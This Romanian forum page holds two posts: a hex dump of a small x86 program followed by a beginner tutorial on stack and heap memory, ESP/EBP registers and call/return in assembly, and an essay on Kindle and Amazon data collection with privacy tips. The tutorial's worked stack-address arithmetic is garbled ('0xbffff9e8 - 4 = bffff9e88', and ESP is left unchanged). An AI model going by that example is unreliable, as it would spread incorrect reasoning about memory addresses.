80483d0 5589e553 83ec0480 3d289804 0800753f U..S....=(....u? 80483e0 a12c9804 08bb2097 040881eb 1c970408 .,.... ......... 80483f0 c1fb0283 eb0139d8 731e8db6 00000000 ......9.s....... 8048400 83c001a3 2c980408 ff14851c 970408a1 ....,........... 8048410 2c980408 39d872e8 c6052898 04080183 ,...9.r...(..... 8048420 c4045b5d c38d7426 008dbc27 00000000 ..[]..t&...'.... 8048430 5589e583 ec18a124 97040885 c07412b8 U......$.....t.. 8048440 00000000 85c07409 c7042424 970408ff ......t...$$.... 8048450 d0c9c390 5589e583 ec28b8e0 85040889 ....U....(...... 8048460 0424e801 ffffffb8 f6850408 8d55f489 .$...........U.. 8048470 54240489 0424e80d ffffff8b 55f4b8fc T$...$......U... 8048480 8504088d 4df4894c 24088954 24048904 ....M..L$..T$... 8048490 24e8d2fe ffffc9c3 5589e583 e4f083ec $.......U....... 80484a0 20c70424 04000000 e8cbfeff ff894424 ..$..........D$ 80484b0 1cb83c86 0408c744 24043098 04088904 ..<....D$.0..... 80484c0 24e8a2fe ffffb874 860408c7 44240424 $......t....D$.$ 80484d0 98040889 0424e88d feffffb8 ac860408 .....$.......... 80484e0 8b54241c 89542404 890424e8 78feffff .T$..T$...$.x... 80484f0 b8d88604 088d5424 18895424 04890424 ......T$..T$...$ 8048500 e863feff ffe84aff ffffb800 000000c9 .c....J......... 8048510 c3909090 90909090 90909090 90909090 ................ 8048520 5589e55d c38d7426 008dbc27 00000000 U..]..t&...'.... 8048530 5589e557 5653e84f 00000081 c3c11200 U..WVS.O........ 8048540 0083ec1c e8bffdff ff8dbb18 ffffff8d ................ 8048550 8318ffff ff29c7c1 ff0285ff 742431f6 .....)......t$1. 8048560 8b451089 4424088b 450c8944 24048b45 .E..D$..E..D$..E 8048570 08890424 ff94b318 ffffff83 c60139fe ...$..........9. 8048580 72de83c4 1c5b5e5f 5dc38b1c 24c39090 r....[^_]...$... 8048590 5589e553 83ec04a1 14970408 83f8ff74 U..S...........t 80485a0 13bb1497 04086690 83eb04ff d08b0383 ......f......... 80485b0 f8ff75f4 83c4045b 5dc39090 ..u....[]... Vom continua cu 2 segmente de memorie importante si anume Stack si Heap ------------- - stack - <-segment de memorie dinamic ------------- - - - - - NULL - <-segment de memorie nealocat - - - - ------------- - heap - <-segment de memorie dinamic ------------- Recapituland , ori de cate ori vor fi stocate date in stack acesta va cobora in jos luand spatiul necesar pentru a stoca aceste date din segmentul NULL, acelasi efect se va intampla daca datele for fi stocate in segmentul heap.Probabil intrebarea voastra este urmatoarea , ce se intampla daca ambele segmente preiau spatiul disponibil din NULL?Ei bine segmentul stack este dinamic iar o data ce datele au fost procesate elibera spatiul din null ,acelasi lucru face si segmentul heap doar ca aici depinde de programator deoarece memoria in acest segment vine alocata prin functia malloc() si vine eliberata folosind functia free()Evident daca careva va aloca o gramada de memorie fara sa fie eliberata folosind-use de segmentul heap vom avea un memory leak.Segmentul stack este divers de heap si o data ce nu mai are nevoie de date va alibera memoria in mod dinamic si automat. Cum functioneaza segmentul stack?In stack vin alocate diverse avariabile in mod dinamic.Spre exemplu daca noi stocam in stack valorile 1,2,3 , pentru a elibera sau extrage valorile se va face in mod invers , si anume prima valoare pe care o vom extrage afara din stack este 3 dupa care 2 si unu.Acest concept vine chemat LIFO (Last In First Out).O mica demonstratie: Avem urmatorul cod: int main() { int var1; //declar o variabila var1 int var2; //declar o variabila var2 int var3; //declar o variabila var3 } Aceste date vin alocate in segmentul stack exact in modul in care au fost declarate si anume: STACK ---------- <-EBP - var1 - ---------- - var2 - ---------- - var3 - ---------- <-ESP Segmentul de stack va creste in jos ocupand spatiu din segmentul NUll Aici voi introduce 2 noi aspecte, in assembly vin folositi doi registrii Registrul ce contine ultima adresa de memorie din stack care se numeste ESP /Extended Stack Pointer), un alt registru ce va contine primul record de memorie din functia sau procedura in care ne aflam si se numeste EBP(Extended Base Pointer)Momentan exista doar o singura functie si anume main. Dupa cum am precizat numerotarea adreselor vine facut de sus in jos in mod invers, nu vom avea niciodata un stack care pleaca de la 0 deoarece intotdeauna in sistem vor exista deja alte processe care se vor folosi de aceste adrese.Asadar presupunem ca in momentul in care vrem sa introducem o valoare in stack ESP se afla la adresa 0xbffff9e8 ,deci pentru a stoca 4 byte in stack va trebui facut un decrement de 4 byte. Deci 0xbffff9e8 - 4 = bffff9e88.Acum ESP se va afla la adresa 0xbffff9e8.De cate ori vine introdusa o valoare vine facut un decrement.Acum in momentul in care eu fac urmatoare operatie matematica si anume bffff9e88 + 4 = 0xbffff9e8 voi sterge 4 byte din stack iar registrl ESP se va afla acum la adresa 0xbffff9e8.Avand in vedere faptul ca pleaca de la ao adresa superioara in decrement spre 0 cand se va face o adunare se vor sterge elemente iar in momentul in care se vor pune elemente se va face un decrement iar adresa stack-ului va creste in jos spre 0.Assembly pune la dispozitie doua instructii pentru a stoca si extrage date din stack, acestea sunt PUSH si POP.PUSH Va stoca o valoare in segmentul stack iar POP va extrage o valoare.Mai exista un aspect foarte important a acestui segment de memorie pe care il voi incerca sa explic cu urmatorul exemplu de cod: #include <stdio.h> int doprint() { printf("Hello\n"); } int main () { doprint(); return 0; } Avem un simplu executabil care chiama o functie care face un print.Vom analiza datele din stack in momentul in care vine chemata functia doprint. Deci in momentul in care vine chemata functia print se intampla acest lucru MAIN chiama doprint 0x080483de <main+6>: call 0x80483c4 <doprint> 0x080483e3 <main+11>: mov $0x0,%eax In acest moment urmatoarea adresa care va trebui sa fie executata dupa ce doprint isi termina treaba va fi stocata in stack ca adresa de return.Can doprint termina treaba se intoarce aici si main continua. Vine pusa valoarea registrului EBP in stack 0x080483c4 <doprint+0>: push %ebp Valoarea EBP 0xbffff9a8 Valoarea actuala din ESP vine pusa in EBP 0x080483c5 <doprint+1>: mov %esp,%ebp In stacK vine facut un decrement de 24 byte pentru a aloca spatiul necesar pentru variabile. 0x080483c7 <doprint+3>: sub $0x18,%esp Note 0x18 este echivalent cu 24 in hex Vin incarcate si stampate datele din functia doprint 0x080483ca <doprint+6>: movl $0x80484b0,(%esp) 0x080483d1 <doprint+13>: call 0x80482f8 <puts@plt> Urmatoarea instructie este importanta deoarece aici functia doprint a terminat treaba si va trebui sa se intoarca in main ca sa termine programul 0x080483d6 <doprint+18>: leave 0x080483d7 <doprint+19>: ret Instructia leave face in asa fel incat registrii ESB si EBP sa isi preia locul initial pe care il aveau inainte sa intre in doprint.Instructia ret va copia adresa 0x080483e3 in EIP asadar procesorul va executa instructtia care se gaseste la aceasta adresa si anume return 0; Stack -------------- - 0x080483e3 - <-Return Address -------------- - EBP (OLD) - -------------- <-EBP - 0xbffff980 - -------------- - 0xbffff990 - -------------- <-ESP In debugger segmentul de stack pentru aceste instructii poate fi reprezentat in acest mod 0xbffff980: 0xb7fc5304 0xb7fc4ff4 0x08048400 0xbffff9a8 0xbffff990: 0xb7eb3365 0xb7ff1040 0xbffff9a8 0x080483e3 Momentan inchei aici tutorialul, voi continua cu alte articole unde voi discuta despre buffer overflow.Daca aveti intrebari , le puteti face.Multe alte lucruri nu au fost explicate pentru a nu pune in confuzie user-ul. Scopul acestui tutorial era sa explice faptul ca memoria poate fi impartita in segmente si ca in aceste segmente pot fi stocate diverse date.
  14. Plecand din 2012 pot afirma ca pamantul nu se invarte doar in jurul Soareleui ci si in jurul unui obiect care poate fi chemat "Social Network". Am incercat intotdeauna sa am o anumita limita cand vine vorba de identitatea personala si sa expun cat mai putine date pe internet.Google mi-a cerut numarul de telefon, Linkedin mia cerut un curriculum si multe alte date ,Blogspot o mica fotografie ,Ebay toate datele personale inclus o carte de credit.Pentru necesitate a trebuit sa multumesc pe fiecare in parte dar totusi am ignorat sa public datele personale catalogate ca fiind confidentiale si am reusit sa conving Ebay spre exemplu ca adresa unde trebuie sa trimita produsul, cartea de credit si contul paypal nu trebuie sa fie neaparat al meu.Am ignorat Facebook si restul portalelor de social network deoarece am considerat ca ar fi o mare pierdere de timp .Daca nu ati creat pana in prezent un cont intrun Social Network sa nu va pierdeti timpul sa il creati.Nu am creat niciodata un cont Yahoo personal si nu m-am folosit de portalul lor deoarece sa spun sincer as fi preferat mai mult Google (doar pentru faptul ca am stimat intotdeauna ceea ce au facut Sergey Brin si Larry Page nu pentru conceptul comercial pe care acest portal il are in prezent).Singurul lucru care ma mai tine legat de Yahoo este portalul Yahoo Finance pentru diversele optiuni pe care le ofera. Am inceput acest articol vorbind despre diverse portale dar voi continua cu Amazon.Intrun final in 2012 am creat si un cont Amazon deoarece mi sa parut interesant acest Ebook pe care il pune la dispozitie si anume Kindle .Ca si Iphone exista diverse tipuri de Kindle iar eu am decis sa iau ceva simplu pentru a citi carti si versiunea Kindle Touch (no ads) a fost cea mai ideala deoarece Kindle Fire nu mai este un Ebook reader (parerea mea) ci un adevarat Ipad.Atentie au preturi diverse si platesti mai mult daca vrei un dispozitiv (no ads).Am deschis pachetul, am apasat butonul, sa aprins display-ul si primul lucru care a aparut e un Hello urmat de numele meu.Ok deci Amazon stie cum ma chiama.A doua oara cand am accesat portalul, Amazon incepe sa imi faca diverse sugestii de produse pe care ar trebui sa mi le cumpar in continuare si anume: 1.Imi spune ca ar trebui sa imi cumpar un incarcator pentru Kindle. 2.Imi spune ca ar trebui sa imi cumpar un cover 3.Imi spune ca imi lipseste si un screen protector pentru Kindle 4.Imi spune ca nu pot citi pe intuneric daca nu iau si un dispozitiv de tipul Reading Lights. Asta inseamna ca Amazon ia decizii pentru mine si stie ce e mai bine.Majoritatea vorbesc de libertate pe cand altii decid cum trebuie sa iti fie satisfacuta placerea sau mai bine zis iti da un oridin dar nu e frumos sa spui ordin deoarece majoritatea cred ca isi cumpara pentru ca au decis in mod personal fara sa fie obligati chiar daca nu e asa. Kindle are wireless si probabil toti se bucura de asa ceva deoarece se pot conecta la internet dar totul are o logica deoarece o data ce iti incarci cartile in dispozitiv si te conectezi la internet Amazon descarca metadata pentru fiecare Book pe care il ai in Kindle si dupa putin timp daca te mai conectezi o data la portalul lor Amazon stie si ce carti iti place sa citesti iar daca mai faci un Search iti apar doar produsele care te intereseaza deoarece Amazon a facut data mining si stie ce vrei defapt.Fiecare query facuta in browser-ul din Kindle este urmarita de catre Amazon si Amazon stie cate pagini ai citit dintro carte si la ce pagina ai ramas.(Keylogger comercial legazilat) Un alt feature important a acestui dispozitiv este faptul ca iti permite sa selectezi text din cartile pe care le citesti si sa pui un NOTE asadar ori de cate ori poti sa ai un bookmark separat a unor randuri dintrun text pe care poate te intereseaza si ai vrea sa le salvezi intrun singur loc.O data ce faci un highlight la un paragraf vine salvat intrun singur loc chemat "My Clippings" si cand te conectezi la internet totul vine sincronizat cu portalul Amazon.Inca o data Amazon isi baga nasul sa vada ce te intereseaza iar data viitoare cand vei face un Search iti va baga pe nas primele produse care au o oarecare legatura cu ceea ce iti place tie.Oricum in subconstient tu vei crede ca de fapt tu vrei sa cumperi acest lucru pentru ca ti-a placut foarte mult dar inca o data altcineva a luat decizia pentru tine.Ca sa obtina mai multe date Amazon a scos pe piata si un Kindle 3G unde Amazon iti plateste conexiunea internet (Works Globally) doar pentru portalul Amazon si Wikipedia (Inca o resursa in plus pentru Data Mining) Evident tu nu poti sa modifici numele unei carti in Kindle daca nu ai o aplicatie externa pentru Ebook management precum Calibre dar conceptul Kindle a fost creat in asa fel incat tu sa te conectezi la internet si sa descarci metadata de pe portalul Amazon asadar alaturi de numele tau care vine deja stampat cand primesti dispozitivul vor sta si datele tale. Un alt aspect in legatura cu Amazon ar fi : In momentul in care cumperi un obiect pe portalul lor ,Amazon iti pregateste un form cu butonul Share pentru Facebook cu obiectul pe care l-ai cumparat , ca sa iti readuca aminte sa nu uiti sa te dai mare pe la altii cu obiectul pe care l-ai cumparat asadar vor venii noi clienti.Inca o data vorbim de libertate dar altii se joaca cu placerile noastre si decid ceea ce ar trebui sa credem noi ca de fapt ne trebuie. Amazon a creat un format pentru Ebook si anume AZW si ofera si un serviciu online unde poti converti diverse alte formaturi precum PDF in AZW deoarece chiar daca Kindle suporta PDF sa nu credeti ca veti putea citi PDF cum credeti voi deoarece format-ul text-ului trebuie structurat pentru display-ul de 6" Inch ca sa fie o asezare in pagina pe placul cititorului dealtfel veti vedea numai prima jumatate verticala a paginii.Ei bine pentru a converti un format in AZW va trebui trimis documentul direct la Amazon si il veti primi direct pe Kindle asadar Amazon va creat deja o adresa de mail cand ati cumparat acest dispozitiv si arata cam asa numeletau[@]kindle.com (inca o data te obliga sa te conectezi la internet cu dispozitivul ca sa verifici email-ul si in acelasi timp iti sincronizezi datele tale cu ei) Deci dorinta mea de a citi carti intrun Ebook a devenit un lucru public care trebuie impartit cu Amazon iar urmatoarele 2 lucruri cumparate pe Amazon au fost alese direct de catre ei deoarece au fost o necesitate pentru ceea ce am cumparat initial iar eu am apasat doar butonul Order.Ce pot sa spun despre structura acestui dispozitiv din punct de vedere Hardware? ,Freescale 532 MHz, ARM-11cu un Kernel Linux si foloseste o tehnologie E Ink (electrophoretic ink) care este destul de perfecta pentru a citi carti deci in loc sa le cititi in fata unui calculator sau in fata unui Ipad care sunt mult mai daunatoare pentru ochi ar fi de preferat sa le cititi in fata unui Ebook reader Alb/Negru.Pentru a mentine datele personale in sacul vostru nu conectati acest dispozitiv la internet si incercati sa folositi diverse alte aplicatii pentru a modifica metadata pentru fiecare ebook in parte precum Calibre.Dispozitivul citeste corect formaturi ca MOBI deci convertiti PDF in MOBI pentru a avea un rezultat mai bun. In rest as putea adauga urmatoarele: Un Kindle care nu este conectat la internet este mai sigur decat un Kindle conectat la internet dar avand in vedere faptul ca nu sunteti liberi vi se vor da ordine in asa fel incat sa luati singuri decizia de a actiona pe placul altora crezand ca va veti satisface placerile voastre. Peace!
×
×
  • Create New...